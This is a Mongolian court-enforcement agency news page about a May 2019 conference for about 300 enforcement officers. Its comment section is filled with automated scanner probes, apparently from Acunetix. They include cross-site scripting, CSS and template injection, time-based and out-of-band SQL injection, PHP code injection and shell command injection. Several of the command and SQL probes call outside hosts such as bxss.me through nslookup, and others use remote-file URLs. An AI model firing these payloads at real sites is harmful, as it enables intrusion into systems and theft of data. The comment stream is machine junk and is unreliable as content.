ШҮҮХИЙН ШИЙДВЭР ГҮЙЦЭТГЭХ ЕРӨНХИЙ ГАЗАР

ШИЙДВЭР ГҮЙЦЭТГЭХ АЛБА

“Шийдвэр гүйцэтгэгчдийн III нэгдсэн зөвлөгөөн”-ийг зохион байгууллаа
Нийтлэгдсэн 2019-05-31 13:48:57 | Үзсэн: 1

“Шийдвэр гүйцэтгэгчдийн III нэгдсэн зөвлөгөөн”-ийг Дотоод хэргийн их сургуулийн Шүүхийн шийдвэр гүйцэтгэлийн сургуультай хамтран 2019 оны 05 дугаар сарын 30, 31-ний өдрүүдэд зохион байгууллаа.

Зөвлөгөөний гол зорилго нь шийдвэр гүйцэтгэгчдийн хууль хэрэглээний мэргэжлийн ур чадварыг дээшлүүлэх, эрх зүйн зохицуулалтыг нэг мөр ойлголтоор хэрэгжүүлэх, практикт үүсч буй хүндрэл, бэрхшээлтэй асуудлын талаар харилцан мэдээлэл солилцох, уг асуудлыг шийдвэрлэх арга замыг хамтаа эрэлхийлж, шийдвэрлэх мөн чиг үүргээ хэрэгжүүлж буй алба хаагчдын эрх зүйн байдлыг дээшлүүлэхэд анхаарал хандуулж, үе шаттай арга хэмжээг хэрэгжүүлэхэд оршино.


Уг зөвлөгөөнд төв, орон нутаг дахь Шүүхийн шийдвэр гүйцэтгэх алба, газраас нийт 300 гаруй ахлах шийдвэр гүйцэтгэгч, шийдвэр гүйцэтгэгчид оролцсон бөгөөд зөвлөгөөнд хамрагдсанаар иргэний, захиргааны, зөрчлийн шийдвэр гүйцэтгэх ажиллагааны шинэчлэл цаашид хэрхэн явагдах, цаашдын зорилго, зорилтын талаар шийдвэр гүйцэтгэгчдийн дунд нээлттэй хэлэлцүүлснээр ажлын сахилга-хариуцлагыг дээшлүүлэх, мэргэжлийн ур чадварыг өсгөх, үйл ажиллагааг шуурхай, ил тод явуулах нөхцөлийг бүрдүүлэх зэрэг ач холбогдолтой юм.


2019-05-31 13:48:57
Сэтгэгдэл бичих

Нэр :
Таны и-мэйл :
Сэтгэгдэл :
Энд дарж зурган кодыг шинэчилнэ үү
Нийт сэтгэгдэл
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
20ACINN[!+!]
2019-05-31 13:48:57
xmufptfb :
20fkMBV ymwz(9684)
2019-05-31 13:48:57
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
20}body{acu:Expre/**/SSion(ymwz(9042))}
2019-05-31 13:48:57
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
[url=http://www.vulnweb.com][/url]
2019-05-31 13:48:57
xmufptfb :
2019-05-31 13:48:57
xmufptfb :
2019-05-31 13:48:57
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
2019-05-31 13:48:57
xmufptfb :
20<ScRiPt>ymwz(9459)</sCripT>
2019-05-31 13:48:57
xmufptfb :
20\u003CScRiPt\ymwz(9950)\u003C/sCripT\u003E
2019-05-31 13:48:57
xmufptfb :
%32%30%3C%53%63%52%69%50%74%20%3E%79%6D%77%7A%289737%29%3C%2F%73%43%72%69%70%54%3E
2019-05-31 13:48:57
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
20
2019-05-31 13:48:57
xmufptfb :
20ymwz(9763)
2019-05-31 13:48:57
xmufptfb :
20ymwz(9177)
2019-05-31 13:48:57
xmufptfb :
20ymwz(9858)
2019-05-31 13:48:57
xmufptfb :
20XMUQI[!+!]
2019-05-31 13:48:57
xmufptfb :
20ymwz(9758)
2019-05-31 13:48:57
xmufptfb :
{{9999736*9999084}}
2019-05-31 13:48:57
xmufptfb :
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒ\C|QNcb b_&5 hg ]s0QL
2019-05-31 13:48:57
xmufptfb :
acux2100z1z2abcxuca2100
2019-05-31 13:48:57
xmufptfb :
acu7685<s1﹥s2ʺs3ʹuca7685
2019-05-31 13:48:57
xmufptfb :
209278897
2019-05-31 13:48:57
xmufptfb :
'"()&%ymwz(9350)
2019-05-31 13:48:57
xmufptfb :
20'"()&%ymwz(9462)
2019-05-31 13:48:57
dsutpnct :
1acuEQ3sX5PES3
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
20P5D8K[!+!]
2019-05-31 13:48:57
wbeudybb :
201DErV 4Woh(9178)
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
20}body{acu:Expre/**/SSion(4Woh(9039))}
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
[url=http://www.vulnweb.com][/url]
2019-05-31 13:48:57
wbeudybb :
2019-05-31 13:48:57
wbeudybb :
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
2019-05-31 13:48:57
wbeudybb :
20<ScRiPt>4Woh(9610)</sCripT>
2019-05-31 13:48:57
wbeudybb :
20\u003CScRiPt\4Woh(9447)\u003C/sCripT\u003E
2019-05-31 13:48:57
wbeudybb :
%32%30%3C%53%63%52%69%50%74%20%3E%34%57%6F%68%289451%29%3C%2F%73%43%72%69%70%54%3E
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
20
2019-05-31 13:48:57
wbeudybb :
204Woh(9958)
2019-05-31 13:48:57
wbeudybb :
204Woh(9777)
2019-05-31 13:48:57
wbeudybb :
204Woh(9626)
2019-05-31 13:48:57
wbeudybb :
20RL4U6[!+!]
2019-05-31 13:48:57
wbeudybb :
204Woh(9440)
2019-05-31 13:48:57
wbeudybb :
{{10000108*10000056}}
2019-05-31 13:48:57
wbeudybb :
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒ\C|QNcb b_&5 hg ]s0QL
2019-05-31 13:48:57
wbeudybb :
acux7564z1z2abcxuca7564
2019-05-31 13:48:57
fqxernax :
''""
2019-05-31 13:48:57
wbeudybb :
acu5472<s1﹥s2ʺs3ʹuca5472
2019-05-31 13:48:57
fqxernax :
JyI=
2019-05-31 13:48:57
wbeudybb :
209823956
2019-05-31 13:48:57
fqxernax :
@@w5K6a
2019-05-31 13:48:57
wbeudybb :
'"()&%4Woh(9304)
2019-05-31 13:48:57
maxvewjb :
218'
2019-05-31 13:48:57
maxvewjb :
20';copy (select '') to program 'nslookup dns.sqli.\013405.85-852.85.2a69d.\1.bxss.me
2019-05-31 13:48:57
maxvewjb :
20;copy (select '') to program 'nslookup dns.sqli.\013405.85-839.85.2a69d.\1.bxss.me'
2019-05-31 13:48:57
wbeudybb :
20'"()&%4Woh(9285)
2019-05-31 13:48:57
maxvewjb :
'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.85-838.85.2a69d.1.bxss'||'.me')||'
2019-05-31 13:48:57
maxvewjb :
20||UTL_INADDR.get_host_address('dns.'||'sqli.013405.85-837.85.2a69d.1.bxss'||'.me')
2019-05-31 13:48:57
maxvewjb :
h6n1uguh');select pg_sleep(9); --
2019-05-31 13:48:57
maxvewjb :
hs96aTAX'));select pg_sleep(9); --
2019-05-31 13:48:57
cylfsbki :
${@print(md5(acunetix_wvs_security_test))}\
2019-05-31 13:48:57
maxvewjb :
uo7OIGiW';select pg_sleep(9); --
2019-05-31 13:48:57
maxvewjb :
-1);select pg_sleep(6); --
2019-05-31 13:48:57
cylfsbki :
${@print(md5(acunetix_wvs_security_test))}
2019-05-31 13:48:57
maxvewjb :
-1));select pg_sleep(9); --
2019-05-31 13:48:57
maxvewjb :
-1;select pg_sleep(6); --
2019-05-31 13:48:57
cylfsbki :
";print(md5(acunetix_wvs_security_test));$a="
2019-05-31 13:48:57
maxvewjb :
1 waitfor delay '0:0:6' --
2019-05-31 13:48:57
maxvewjb :
lv6YlgS9'; waitfor delay '0:0:6' --
2019-05-31 13:48:57
maxvewjb :
-1); waitfor delay '0:0:6' --
2019-05-31 13:48:57
maxvewjb :
-1; waitfor delay '0:0:3' --
2019-05-31 13:48:57
maxvewjb :
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
2019-05-31 13:48:57
maxvewjb :
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
2019-05-31 13:48:57
maxvewjb :
-1 OR 3+646-646-1=0+0+0+1
2019-05-31 13:48:57
maxvewjb :
-1 OR 3+759-759-1=0+0+0+1 --
2019-05-31 13:48:57
maxvewjb :
-1 OR 2+646-646-1=0+0+0+1
2019-05-31 13:48:57
maxvewjb :
1*1*1*20
2019-05-31 13:48:57
maxvewjb :
-1 OR 2+759-759-1=0+0+0+1 --
2019-05-31 13:48:57
maxvewjb :
1*1*1*20
2019-05-31 13:48:57
maxvewjb :
1*1*1*20
2019-05-31 13:48:57
abqiskkw :
2019-05-31 13:48:57
maxvewjb :
uMbBl4I7
2019-05-31 13:48:57
maxvewjb :
1*1*1*20
2019-05-31 13:48:57
cylfsbki :
';print(md5(acunetix_wvs_security_test));$a='
2019-05-31 13:48:57
hwolyqwp :
/www.vulnweb.com
2019-05-31 13:48:57
cylfsbki :
;print(md5(acunetix_wvs_security_test));
2019-05-31 13:48:57
jicdypyx :
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
2019-05-31 13:48:57
gtclgjbe :
http://hitbtjQJ96bCd.bxss.me/
2019-05-31 13:48:57
lfjdrqij :
news/.
2019-05-31 13:48:57
lfjdrqij :
news
2019-05-31 13:48:57
cdgvmwpv :
http://testasp.vulnweb.com/t/xss.html?%00.jpg
2019-05-31 13:48:57
qtmycohy :
'"()
2019-05-31 13:48:57
pmwryygm :
testasp.vulnweb.com
2019-05-31 13:48:57
pspadvbi :
^(#$!@#$)(()))******
2019-05-31 13:48:57
pmwryygm :
http://testasp.vulnweb.com/t/fit.txt?.jpg
2019-05-31 13:48:57
pspadvbi :
!(()&&!|*|*|
2019-05-31 13:48:57
pmwryygm :
Http://testasp.vulnweb.com/t/fit.txt
2019-05-31 13:48:57
pmwryygm :
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
2019-05-31 13:48:57
easwrsuq :
20&n964523=v971324
2019-05-31 13:48:57
jlvwyugy :
${9999361+10000486}
2019-05-31 13:48:57
fsetqwik :
to@example.com> bcc:013405.85-820.85.2a69d.1@bxss.me
2019-05-31 13:48:57
fsetqwik :
20 bcc:013405.85-819.85.2a69d.1@bxss.me
2019-05-31 13:48:57
srrndbxx :
$(nslookup dns.ce.\013405.85-814.85.2a69d.\1.bxss.me)
2019-05-31 13:48:57
srrndbxx :
&nslookup dns.ce.\013405.85-816.85.2a69d.\1.bxss.me&'\"`0&nslookup dns.ce.\013405.85-816.85.2a69d.\1.bxss.me&`'
2019-05-31 13:48:57
srrndbxx :
set|set&set
2019-05-31 13:48:57
hybdibmy :
20'>">
2019-05-31 13:48:57
qahlgymc :
"+response.write(9806194*9612523)+"
2019-05-31 13:48:57
hybdibmy :
20
2019-05-31 13:48:57
kabrgbnr :
nAlIQEJt
2019-05-31 13:48:57
qahlgymc :
'+response.write(9806194*9612523)+'
2019-05-31 13:48:57
qahlgymc :
response.write(9806194*9612523)
2019-05-31 13:48:57
Нийслэлийн шийдвэр гүйцэтгэх газар
 • Утас :
  70001480
 • Факс :
  70001482
 • Имэйл :
  shgg@cd.gov.mn
 • Манай хаяг :

  Улаанбаатар хот, Сүхбаатар дүүрэг, 10-р хороо, Цагдаагийн гудамж ШШГЕГ-ын хоёрдугаар байр